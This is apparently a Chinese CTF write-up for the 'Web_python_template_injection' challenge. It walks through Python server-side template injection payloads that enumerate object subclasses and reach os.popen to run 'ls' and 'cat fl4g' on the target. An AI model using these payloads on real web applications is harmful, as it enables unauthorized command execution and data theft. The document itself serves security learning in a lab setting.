WEB:Web_python_template_injection

背景知识

        python模板注入

        ssit

题目

WEB:Web_python_template_injection_第1张图片

 

打开题目,发现页面提示,翻译为python模板注入

先测试是否存在注入

WEB:Web_python_template_injection_第2张图片

可以发现被执行了

先查看所有的子类

payload

{{[].__class__.__base__.__subclasses__()}}

 WEB:Web_python_template_injection_第3张图片

利用site.Printer的os模块执行命令

payload

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

 

 可以看到当前目录下有个fl4g,执行cat fl4g

payload

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

 得到flag

参考学习链接:

https://www.cnblogs.com/qiushuo/p/17454498.html

攻防世界-web-Web_python_template_injection_wuh2333的博客-CSDN博客

Web_python_template_injection(Python模块注入)_kali-Myon的博客-CSDN博客

你可能感兴趣的:(前端,python,开发语言,web安全,网络安全)